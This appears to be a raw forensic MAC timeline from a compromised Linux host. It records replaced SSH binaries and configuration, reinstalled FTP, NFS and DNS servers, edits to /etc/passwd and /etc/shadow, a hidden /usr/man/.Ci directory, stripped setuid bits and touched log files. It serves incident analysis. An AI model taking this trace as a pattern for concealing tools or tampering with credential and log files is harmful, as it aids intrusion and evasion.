604938 mac -rws--x--x
root root /usr/local/bin/ssh1
Nov
08 00 06:53:12 21 mac lrwxrwxrwx
root root /usr/local/bin/make-ssh-known-hosts ->
make-ssh-known-hosts1
21228 mac -rwxr-xr-x
root root /usr/local/bin/make-ssh-known-hosts1
4 mac lrwxrwxrwx
root root /usr/local/bin/scp -> scp1
90424 mac -rwxr-xr-x
root root /usr/local/bin/scp1
8 mac lrwxrwxrwx
root root /usr/local/bin/ssh-add -> ssh-add1
337617 mac -rwxr-xr-x
root root /usr/local/bin/ssh-add1
10 mac lrwxrwxrwx
root root /usr/local/bin/ssh-agent -> ssh-agent1
343586 mac -rwxr-xr-x
root root
/usr/local/bin/ssh-agent1
5 m.c lrwxrwxrwx
root root /usr/local/sbin/sshd -> sshd1
643674 m.c -rwxr-xr-x
root root /usr/local/sbin/sshd1
955 m.c -rwxr-xr-x root root
/etc/rc.d/rc.local
684 m.c -rw-r--r--
root root /etc/sshd_config
4096 m.c drwxr-xr-x
root root /usr/local/man/man1
23 mac lrwxrwxrwx
root root /usr/local/man/man1/make-ssh-known-hosts.1 ->
make-ssh-known-hosts1.1
12272 mac -rw-r--r--
root root /usr/local/man/man1/make-ssh-known-hosts1.1
6 mac lrwxrwxrwx
root root /usr/local/man/man1/scp.1 -> scp1.1
4892 mac -rw-r--r--
root root /usr/local/man/man1/scp1.1
5 mac lrwxrwxrwx
root root /usr/local/man/man1/slogin.1 -> ssh.1
6 mac lrwxrwxrwx
root root /usr/local/man/man1/slogin1.1 -> ssh1.1
10 mac lrwxrwxrwx
root root /usr/local/man/man1/ssh-add.1 -> ssh-add1.1
4007 mac -rw-r--r--
root root /usr/local/man/man1/ssh-add1.1
12 mac lrwxrwxrwx root root
/usr/local/man/man1/ssh-agent.1 -> ssh-agent1.1
6265 mac -rw-r--r--
root root /usr/local/man/man1/ssh-agent1.1
13 mac lrwxrwxrwx
root root /usr/local/man/man1/ssh-keygen.1 -> ssh-keygen1.1
5824 mac -rw-r--r--
root root /usr/local/man/man1/ssh-keygen1.1
6 mac lrwxrwxrwx
root root /usr/local/man/man1/ssh.1 -> ssh1.1
38572 mac -rw-r--r-- root
root
/usr/local/man/man1/ssh1.1
4096 m.c drwxr-xr-x
root root /usr/local/man/man8
7 mac lrwxrwxrwx
root root /usr/local/man/man8/sshd.8 -> sshd1.8
37023 mac -rw-r--r-- root root
/usr/local/man/man8/sshd1.8
5 mac -rw-r--r--
root root /var/run/sshd.pid
Nov
08 00 06:53:40 484 ..c -rw-------
root root /etc/ftpaccess
456 ..c -rw------- root
root /etc/ftpconversions
39 ..c -rw-------
root root /etc/ftpgroups
104 ..c -rw-------
root root /etc/ftphosts
79 ..c -rw-------
root root /etc/ftpusers
1024 m.c drwxr-xr-x
root root /etc/logrotate.d
78 ..c -rw-r--r--
root root /etc/logrotate.d/ftpd
1024 m.c drwxr-xr-x
root root /etc/pam.d
314 ..c -rw-r--r--
root root /etc/pam.d/ftp
16384 m.c drwxr-xr-x
root root /usr/bin
8928 ..c -rwxr-xr-x
bin bin /usr/bin/ftpcount
8928 ..c -rwxr-xr-x bin
bin /usr/bin/ftpwho
4096 m.c drwxr-xr-x
root root /usr/doc/wu-ftpd-2.6.0
112149 ..c -rw-r--r--
root root /usr/doc/wu-ftpd-2.6.0/CHANGES
11382 ..c -rw-r--r--
root root /usr/doc/wu-ftpd-2.6.0/CONTRIBUTORS
2580 ..c -rw-r--r--
root root /usr/doc/wu-ftpd-2.6.0/ERRATA
4096 m.c drwxr-xr-x
root root /usr/doc/wu-ftpd-2.6.0/HOWTO
28539 ..c -rw-r--r-- root root
/usr/doc/wu-ftpd-2.6.0/HOWTO/VIRTUAL.FTP.SUPPORT
18641 ..c -rw-r--r--
root root /usr/doc/wu-ftpd-2.6.0/HOWTO/upload.configuration.HOWTO
3185 ..c -rw-r--r--
root root /usr/doc/wu-ftpd-2.6.0/README
4396 ..c -rw-r--r--
root root /usr/doc/wu-ftpd-2.6.0/TODO
4096 m.c drwxr-xr-x
root root /usr/doc/wu-ftpd-2.6.0/examples
404 ..c -rw-r--r-- root root
/usr/doc/wu-ftpd-2.6.0/examples/ftpaccess
1866 ..c -rw-r--r--
root root /usr/doc/wu-ftpd-2.6.0/examples/ftpaccess.heavy
538 ..c -rw-r--r--
root root /usr/doc/wu-ftpd-2.6.0/examples/ftpconversions
137 ..c -rw-r--r--
root root /usr/doc/wu-ftpd-2.6.0/examples/ftpconversions.solaris
37 ..c -rw-r--r--
root root /usr/doc/wu-ftpd-2.6.0/examples/ftpgroups
190 ..c -rw-r--r--
root root /usr/doc/wu-ftpd-2.6.0/examples/ftphosts
882 ..c -rw-r--r--
root root /usr/doc/wu-ftpd-2.6.0/examples/ftpservers
83 ..c -rw-r--r--
root root /usr/doc/wu-ftpd-2.6.0/examples/ftpusers
16384 m.c drwxr-xr-x
root root /usr/man/man1
701 ..c -rw-r--r--
root root /usr/man/man1/ftpcount.1.gz
702 ..c -rw-r--r--
root root /usr/man/man1/ftpwho.1.gz
14006 ..c -rw-r--r--
root root /usr/man/man5/ftpaccess.5.gz
857 ..c -rw-r--r--
root root /usr/man/man5/ftpconversions.5.gz
815 ..c -rw-r--r-- root root
/usr/man/man5/ftphosts.5.gz
1635 ..c -rw-r--r--
root root /usr/man/man5/ftpservers.5.gz
1490 ..c -rw-r--r--
root root /usr/man/man5/xferlog.5.gz
5272 ..c -rw-r--r--
root root /usr/man/man8/ftpd.8.gz
846 ..c -rw-r--r--
root root /usr/man/man8/ftprestart.8.gz
1583 ..c -rw-r--r--
root root /usr/man/man8/ftpshut.8.gz
1350 ..c -rw-r--r--
root root /usr/man/man8/privatepw.8.gz
7792 ..c -rwxr-xr-x
bin bin /usr/sbin/ckconfig
8112 ..c -rwxr-xr-x
bin bin /usr/sbin/ftprestart
10800 ..c -rwxr-xr-x
bin bin /usr/sbin/ftpshut
162608 ..c -rwxr-xr-x
bin bin /usr/sbin/in.ftpd
7 .ac lrwxrwxrwx
bin bin /usr/sbin/in.wuftpd -> in.ftpd
10448 ..c -rwxr-xr-x
bin bin /usr/sbin/privatepw
7 .ac lrwxrwxrwx
bin bin /usr/sbin/wu.ftpd -> in.ftpd
10438 ..c -rwxr-xr-x
bin bin /usr/sbin/xferstats
Nov
08 00 06:53:49 1024 m.c drwxr-xr-x
root root /etc/rc.d/init.d
2257 .ac -rwxr-xr-x
root root /etc/rc.d/init.d/nfs
1722 ..c -rwxr-xr-x
root root /etc/rc.d/init.d/nfslock
3072 m.c drwxr-xr-x root root /sbin
2848 ..c -rwxr-xr-x
root root /sbin/rpc.lockd
19888 ..c -rwxr-xr-x
root root /sbin/rpc.statd
6960 ..c -rwxr-xr-x
root root /sbin/rpcdebug
4096 m.c drwxr-xr-x
root root /usr/doc
4096 m.c drwxr-xr-x
root root /usr/doc/nfs-utils-0.1.9.1
2397 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/ChangeLog
563 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/INSTALL
1058 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/KNOWNBUGS
10337 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/NEW
2305 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/README
291 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/THANKS
4517 ..c -rw-r--r-- root root
/usr/doc/nfs-utils-0.1.9.1/TODO
3882 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/index.html
3882 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/nfs.html
186037 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/nfs.ps
2626 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node1.html
3254 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node10.html
4615 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node11.html
3479 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node12.html
2432 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node13.html
6807 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node14.html
7418 ..c -rw-r--r--
root root
/usr/doc/nfs-utils-0.1.9.1/node15.html
8743 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node16.html
2064 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node17.html
2786 ..c -rw-r--r-- root root
/usr/doc/nfs-utils-0.1.9.1/node18.html
2165 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node19.html
2399 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node2.html
1989 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node20.html
2291 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node21.html
13506 ..c -rw-r--r-- root
root
/usr/doc/nfs-utils-0.1.9.1/node22.html
13490 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node23.html
15226 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node24.html
2377 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node25.html
15230 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node26.html
2377 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node27.html
2903 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node3.html
3966 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node4.html
2623 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node5.html
4444 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node6.html
4157 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node7.html
3989 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node8.html
2756 ..c -rw-r--r--
root root /usr/doc/nfs-utils-0.1.9.1/node9.html
4096 m.c drwxr-xr-x root root /usr/man/man5
6244 ..c -rw-r--r--
root root /usr/man/man5/exports.5.gz
12288 m.c drwxr-xr-x
root root /usr/man/man8
2224 ..c -rw-r--r--
root root /usr/man/man8/exportfs.8.gz
376 ..c -rw-r--r--
root root /usr/man/man8/lockd.8.gz
1246 ..c -rw-r--r--
root root /usr/man/man8/mountd.8.gz
702 ..c -rw-r--r-- root
root /usr/man/man8/nfsd.8.gz
788 ..c -rw-r--r--
root root /usr/man/man8/nfsstat.8.gz
341 ..c -rw-r--r--
root root /usr/man/man8/nhfsgraph.8.gz
332 ..c -rw-r--r-- root root
/usr/man/man8/nhfsnums.8.gz
235 ..c -rw-r--r--
root root /usr/man/man8/nhfsrun.8.gz
4030 ..c -rw-r--r--
root root /usr/man/man8/nhfsstone.8.gz
10 mac lrwxrwxrwx
root root /usr/man/man8/rpc.lockd.8.gz -> lockd.8.gz
11 .ac lrwxrwxrwx
root root /usr/man/man8/rpc.mountd.8.gz -> mountd.8.gz
9 .ac lrwxrwxrwx root root
/usr/man/man8/rpc.nfsd.8.gz -> nfsd.8.gz
12 .ac lrwxrwxrwx
root root /usr/man/man8/rpc.rquotad.8.gz -> rquotad.8.gz
10 .ac lrwxrwxrwx
root root /usr/man/man8/rpc.statd.8.gz -> statd.8.gz
476 ..c -rw-r--r--
root root /usr/man/man8/rquotad.8.gz
805 ..c -rw-r--r--
root root /usr/man/man8/showmount.8.gz
718 ..c -rw-r--r--
root root /usr/man/man8/statd.8.gz
25232 ..c -rwxr-xr-x
root root /usr/sbin/exportfs
6352 ..c -rwxr-xr-x
root root /usr/sbin/nfsstat
18640 ..c -rwxr-xr-x
root root /usr/sbin/nhfsstone
36784 ..c -rwxr-xr-x
root root /usr/sbin/rpc.mountd
3368 ..c -rwxr-xr-x
root root /usr/sbin/rpc.nfsd
9872 ..c -rwxr-xr-x
root root /usr/sbin/rpc.rquotad
9104 ..c -rwxr-xr-x root root
/usr/sbin/showmount
1024 m.c drwxr-xr-x
root root /var/lib/nfs
0 ..c -rw-r--r--
root root /var/lib/nfs/etab
0 ..c -rw-r--r--
root root /var/lib/nfs/rmtab
0 ..c -rw-r--r--
root root /var/lib/nfs/xtab
16384 m.c -rw-r--r--
root root /var/lib/rpm/conflictsindex.rpm
1343488 mac -rw-r--r--
root root /var/lib/rpm/fileindex.rpm
16384 m.c -rw-r--r--
root root /var/lib/rpm/groupindex.rpm
16384 m.c -rw-r--r--
root root /var/lib/rpm/nameindex.rpm
4173832 mac -rw-r--r--
root root /var/lib/rpm/packages.rpm
49152 m.c -rw-r--r--
root root /var/lib/rpm/providesindex.rpm
49152 m.c -rw-r--r--
root root /var/lib/rpm/requiredby.rpm
16384 m.c -rw-r--r-- root root
/var/lib/rpm/triggerindex.rpm
4 mac -rw-------
root root /var/lib/nfs/state
0 mac -rw-r--r--
root root /var/lock/subsys/nfslock
Nov
08 00 06:54:22 6416 mac -rwxr-xr-x
root root /usr/local/bin/addr
Nov
08 00 06:54:23 271188 ..c -rwxr-xr-x
root root /usr/local/bin/dig
241744 mac -rwxr-xr-x
root root /usr/local/bin/dnsquery
260816 mac -rwxr-xr-x
root root /usr/local/bin/host
4096 m.c drwxr-xr-x
root root /usr/local/bin
3296 mac -rwxr-xr-x
root root /usr/local/bin/mkservdb
241792 mac -rwxr-xr-x
root root /usr/local/bin/nsupdate
4096 m.c drwxr-xr-x
root root /usr/local/sbin
263960 m.c -rwxr-xr-x
root root /usr/local/sbin/irpd
525412 m.c -rwxr-xr-x
root root /usr/local/sbin/named
7166 mac -rwxr-xr-x
root root /usr/local/sbin/named-bootconf
36960 mac -rwxr-xr-x
root root /usr/local/sbin/ndc
4096 m.c drwxr-xr-x
root root /usr/sbin
525412 mac -rwxr-xr-x
root root /usr/sbin/named
1024 m.c drwxr-xr-x
root root /var/run
5 mac -rw-r--r--
root root /var/run/named.pid
0 mac -rw------- root root
/var/run/ndc
Nov
08 00 06:55:30 4096 m.c drwxr-xr-x
root root /usr/libexec/awk
Nov
08 00 06:55:51 78 m.c -rw-r--r--
root root /usr/libexec/awk/addy.awk
Nov
08 00 06:55:58 657 m.c -rw-r--r-- root root
/etc/passwd
601 m.c -rw-r--r--
root root /etc/shadow
Nov
08 00 06:56:02 1024 m.c drwxr-xr-x
root root /var/log
7974 mac -rw-r--r--
root root /var/log/messages
268 mac -rw-r--r--
root root /var/log/secure
0 mac -rw-r--r--
root root /var/log/xferlog
Nov
08 00 06:56:08 4096 m.c drwxr-xr-x
1010 users /usr/man/.Ci
Nov
08 00 06:56:59 17968 ..c -rwx------
root root /bin/ping
45388 ..c -rwx------
root tty /sbin/dump
67788 ..c -rwx------
root tty /sbin/restore
33288 ..c -rwx------
root root /usr/bin/at
35168 ..c -rwx------
root root /usr/bin/chage
36756 ..c -rwx------
root root /usr/bin/gpasswd
5640 ..c -rwx------
root root /usr/bin/newgrp
531516 ..c -rwx------
root root /usr/bin/sperl5.00503
531516 ..c -rwx------
root root /usr/bin/suidperl
34751 ..c -rwx------
root root /usr/libexec/pt_chown
16488 ..c -rwx------ root bin
/usr/sbin/traceroute
5896 ..c -rwx------
root root /usr/sbin/usernetctl
1024 m.c drwxrwxrwx
root root /tmp
Nov
08 00 06:59:07 4096 m.c drwx------
drosen drosen /home/drosen
52 mac -rw-------
drosen drosen /home/drosen/.bash_history
34816 m.c drwxr-xr-x
root root /dev
1024 m.c drwxrwxrwx
root root /var/tmp
184 mac -rw-r--r--
root root /var/tmp/nap
Nov
08 00 07:03:05 3027 m.c -rw-r--r--
root root /etc/inetd.conf
512 m.c -rw-------
root root /etc/ssh_random_seed
0 ..c crw--w---- root
tty /dev/vcs1
0 ..c crw--w----
root tty /dev/vcsa1
1460292 mac -rw-r--r--
root root /var/log/lastlog
768 m.c -rw-r--r--
root root /var/log/wtmp